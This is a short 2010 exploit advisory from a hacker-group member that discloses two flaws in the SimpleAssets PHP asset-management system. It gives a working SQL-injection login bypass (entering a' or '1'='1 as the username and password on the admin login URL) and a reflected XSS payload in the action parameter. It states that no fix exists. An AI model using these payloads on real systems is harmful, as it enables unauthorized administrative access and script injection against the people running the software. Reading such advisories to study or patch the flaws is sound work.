SimpleAssets (Auth Bypass/XSS) Multiple Vulnerabilities

2010-06-22 16:03:17

1 ########################################## 1
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title:SimpleAssets Authentication Bypass & XSS Vulnerability
Vendor url:http://simpleassets.sourceforge.net/
Version:n/a
Price:n/a
Published: 2010-06-21
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team
Shoutzz:- To all ICW members

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:

SimpleAssets is a web based asset management system to track assets, employees, software licenses, ip addresses and asset sign in and sign out. Supports importing from existing DB's. An online demo is available to try before you download. (PHP/MySQL) Code: PHP 4.0

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~

Vulnerability:

*Authentication Bypass found

The Provided Script as Sqli Vulnerability in Admin Login page

DEMO URL : http://server/simpleassets/index.php?action=login&lastaction=&lastkey=&loginout=2

Use the string a' or '1'='1 for Username and Password to gain access.



*XSS Vulnerability

Parameter: '"--><script>alert(0x000872)</script>

Demo URL:-http://server/simpleassets/index.php?action=[xss]


# 0day n0 m0re #
# L0rd CrusAd3r #

Fixes

No fixes

In order to submit a new fix you need to be registered.